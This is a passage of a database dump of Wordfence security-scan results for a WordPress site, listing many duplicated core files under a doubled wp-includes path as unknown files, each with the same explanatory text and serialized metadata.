tab)</span></a>','a:5:{s:4:\"file\";s:70:\"wp-includes/wp-includes/customize/class-wp-customize-theme-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77379,1675048824,1675048824,'new','knownfile',75,'6e69abaaf829533160ea3956980b2c11','f9030ea3b7a6285f0c8505c63580253f','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-themes-panel.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:69:\"wp-includes/wp-includes/customize/class-wp-customize-themes-panel.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77380,1675048824,1675048824,'new','knownfile',75,'195a5e425d9ecfe9e5c2d23f280c1574','89a9adbca0f00458122e523315ac50fb','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-themes-section.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:71:\"wp-includes/wp-includes/customize/class-wp-customize-themes-section.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77381,1675048824,1675048824,'new','knownfile',75,'f2f3f4316ce08a39a736afa21a05c9ad','520b2b3f68eba47ec1401c8728b59244','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-upload-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:71:\"wp-includes/wp-includes/customize/class-wp-customize-upload-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77382,1675048824,1675048824,'new','knownfile',75,'8aebe102ca83c9ba9f23a10210370468','860487125e56667f703f442b9c1c797d','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-widget-area-customize-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:76:\"wp-includes/wp-includes/customize/class-wp-widget-area-customize-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77383,1675048824,1675048824,'new','knownfile',75,'a5ea1a9e860646412f3303885309ee64','d0936f6da81414cad0e86831b3b8da75','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-widget-form-customize-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:76:\"wp-includes/wp-includes/customize/class-wp-widget-form-customize-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77384,1675048824,1675048824,'new','knownfile',75,'e172f3b1d20ab40c5d01065d274253d2','eebc29b061a88ac2195ceaa5629a3ed7','Unknown file in WordPress core: wp-includes/wp-includes/date.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:32:\"wp-includes/wp-includes/date.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77385,1675048825,1675048825,'new','knownfile',75,'002344d295c2a9c9bb9d6da4dc045f0c','b074eb615faafe06f93a0068a775eedd','Unknown file in WordPress core: wp-includes/wp-includes/default-constants.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/default-constants.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77386,1675048825,1675048825,'new','knownfile',75,'dc4a7dc2bfc56c7b6ada4afb121eccb7','9f5f712590d7a9e046aaea38adf59706','Unknown file in WordPress core: wp-includes/wp-includes/default-filters.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/default-filters.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77387,1675048825,1675048825,'new','knownfile',75,'1cbf7cc6a6c53344a3990f1511db9a11','e277bb45841e468950a1b17de0ea3504','Unknown file in WordPress core: wp-includes/wp-includes/default-widgets.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/default-widgets.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77388,1675048825,1675048825,'new','knownfile',75,'e88f280ed49d3567ad6f371775d80578','f4ad88cfe704f11083f5c7012a5cc427','Unknown file in WordPress core: wp-includes/wp-includes/deprecated.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/deprecated.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77389,1675048825,1675048825,'new','knownfile',75,'66f81e0b5804dc8470b2d03a37a60bd2','a764c0b72b04f6cb539473ac005b8af6','Unknown file in WordPress core: wp-includes/wp-includes/embed-template.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/embed-template.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77390,1675048825,1675048825,'new','knownfile',75,'7ad3257b61c9d0b86a54e115e31a60da','8e7744b4973b358ae852e86f1f8b423f','Unknown file in WordPress core: wp-includes/wp-includes/embed.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:33:\"wp-includes/wp-includes/embed.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77391,1675048825,1675048825,'new','knownfile',75,'7659437bf31fbf08a6384cfdf25996a9','2cf0884644e0f6b12933b13d54dbb814','Unknown file in WordPress core: wp-includes/wp-includes/error-protection.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/error-protection.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77392,1675048825,1675048825,'new','knownfile',75,'d40ef568ec0deca9a1cc48cc729b168a','edc1637d9d69beafa177a9e26fa5053d','Unknown file in WordPress core: wp-includes/wp-includes/feed-atom-comments.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/feed-atom-comments.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77393,1675048825,1675048825,'new','knownfile',75,'eb7fab1d0b18164c1a1713d7fc308563','b9e7ac8d9aaa378cfd8fc175c22d26d4','Unknown file in WordPress core: wp-includes/wp-includes/feed-atom.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:37:\"wp-includes/wp-includes/feed-atom.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77394,1675048825,1675048825,'new','knownfile',75,'9502a14396b85c73e4b0ed6ce2b30a01','740f3964eb947cdc39a6e99da8c714a3','Unknown file in WordPress core: wp-includes/wp-includes/feed-rdf.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:36:\"wp-includes/wp-includes/feed-rdf.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77395,1675048826,1675048826,'new','knownfile',75,'f21442d4627eb4891554a76aa3c2bbd4','a6c797766a942208f46426858284654f','Unknown file in WordPress core: wp-includes/wp-includes/feed-rss.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:36:\"wp-includes/wp-includes/feed-rss.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77396,1675048826,1675048826,'new','knownfile',75,'57e4840c5adbdb24d017846da8b638dd','6b7dc1ac1ab27b8d6d5a1e1758871f7c','Unknown file in WordPress core: wp-includes/wp-includes/feed-rss2-comments.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/feed-rss2-comments.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77397,1675048826,1675048826,'new','knownfile',75,'6d5b239b18454692d0dd79bb8f9d2b2b','eb909104f8406d9f9e739b136d48fc33','Unknown file in WordPress core: wp-includes/wp-includes/feed-rss2.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:37:\"wp-includes/wp-includes/feed-rss2.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77398,1675048826,1675048826,'new','knownfile',75,'d41a32afd41f30bae8c45850077c71a2','1f99168e0ee8dda36ca212ff8f14a07e','Unknown file in WordPress core: wp-includes/wp-includes/feed.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:32:\"wp-includes/wp-includes/feed.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77399,1675048826,1675048826,'new','knownfile',75,'2d3c516584f398351b7514ae512eaa96','6180ad51bded40e3aea3e2960a4bfc8a','Unknown file in WordPress core: wp-includes/wp-includes/formatting.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/formatting.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77400,1675048826,1675048826,'new','knownfile',75,'6def27f74462697e6049acfaae2cba4f','1bcd54d462de136cf63f4c13886de6cf','Unknown file in WordPress core: wp-includes/wp-includes/functions.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:37:\"wp-includes/wp-includes/functions.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77401,1675048826,1675048826,'new','knownfile',75,'0a75ef0544398e81342ed5d3693af326','c9f8dedde0a03b76dbc3ddb2b1cfaa1c','Unknown file in WordPress core: wp-includes/wp-includes/functions.wp-scripts.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/functions.wp-scripts.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77402,1675048827,1675048827,'new','knownfile',75,'9a6987ee556e81a0644f7ab03d8d8cb8','a3407b95e4c4af2ad10e2d1261b2f6b2','Unknown file in WordPress core: wp-includes/wp-includes/functions.wp-styles.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/functions.wp-styles.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77403,1675048827,1675048827,'new','knownfile',75,'5819ad1c54698b9b011de081caac8eeb','970a44fc9efaf8f5bdd82d5fb5e74163','Unknown file in WordPress core: wp-includes/wp-includes/general-template.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/general-template.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77404,1675048827,1675048827,'new','knownfile',75,'c823ae0c558d8a95e98c211186681a6c','97cdf2d00ca759af715887880bf9f5eb','Unknown file in WordPress core: wp-includes/wp-includes/http.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:32:\"wp-includes/wp-includes/http.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77405,1675048827,1675048827,'new','knownfile',75,'93e7b26c7e607fa04a851c9be22b6093','e0c52bd1ef0f05ae7b4a686cd8044d5f','Unknown file in WordPress core: wp-includes/wp-includes/https-detection.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/https-detection.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77406,1675048827,1675048827,'new','knownfile',75,'c3ec9aae79a10c0db19fd91e0bce4942','74650ebeaac066f1a5470fae054270af','Unknown file in WordPress core: wp-includes/wp-includes/https-migration.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/https-migration.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77407,1675048827,1675048827,'new','knownfile',75,'0a89880fd477df6b6ce55871e02b3cf4','dccc5b322560a34360dc988a4d792749','Unknown file in WordPress core: wp-includes/wp-includes/images/admin-bar-sprite-2x.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/images/admin-bar-sprite-2x.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77408,1675048827,1675048827,'new','knownfile',75,'05b1081077706eb88e24770f7b17871a','ca599aa57d7d9f184011f080b6245bca','Unknown file in WordPress core: wp-includes/wp-includes/images/admin-bar-sprite.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/images/admin-bar-sprite.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77409,1675048827,1675048827,'new','knownfile',75,'50d106cafb9f883e571244b458cadb65','7d4a57eafd2a7af9c64db4575dcde0fe','Unknown file in WordPress core: wp-includes/wp-includes/images/arrow-pointer-blue-2x.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/images/arrow-pointer-blue-2x.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77410,1675048827,1675048827,'new','knownfile',75,'967bf3a2b57e7f0ca3d70e8d6a12992f','5bbe7be3d8f1bc9f056424a61bd8a11c','Unknown file in WordPress core: wp-includes/wp-includes/images/arrow-pointer-blue.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/images/arrow-pointer-blue.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77411,1675048827,1675048827,'new','knownfile',75,'2d78fd374e8a1115e482467b03ac7eb1','61e7e946cdc564ebea9d885633ae8a32','Unknown file in WordPress core: wp-includes/wp-includes/images/blank.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/images/blank.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77412,1675048827,1675048827,'new','knownfile',75,'588c3a290f8655cc7d80e70758d81612','2d63f83e56e874c5c5a429650cfebce2','Unknown file in WordPress core: wp-includes/wp-includes/images/crystal/archive.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/images/crystal/archive.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77413,1675048827,1675048827,'new','knownfile',75,'ec434c9dba33710118a0e20b919461b6','08b38c690bc0530f93ac15c59c2f13a2','Unknown file in WordPress core: wp-includes/wp-includes/images/crystal/audio.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/images/crystal/audio.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77414,1675048827,1675048827,'new','knownfile',75,'ce02307813608de9312d456d7059fa85','746921b236a90339dfde4fb45f65782c','Unknown file in WordPress core: wp-includes/wp-includes/images/crystal/code.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/images/crystal/code.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77415,1675048827,1675048827,'new','knownfile',75,'da70d587ab9fe48410af000aa1cc3c64','9a1fa68d2e9e72ab8531382d60eb2a60','Unknown file in WordPress core: wp-includes/wp-includes/images/crystal/default.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/images/crystal/default.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77416,1675048827,1675048827,'new','knownfile',75,'7a340ecb4609cb704fccc697e1793b19','b209b0349bcc927379238d1a4b2b7b8e','Unknown file in WordPress core: wp-includes/wp-includes/images/crystal/document.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new 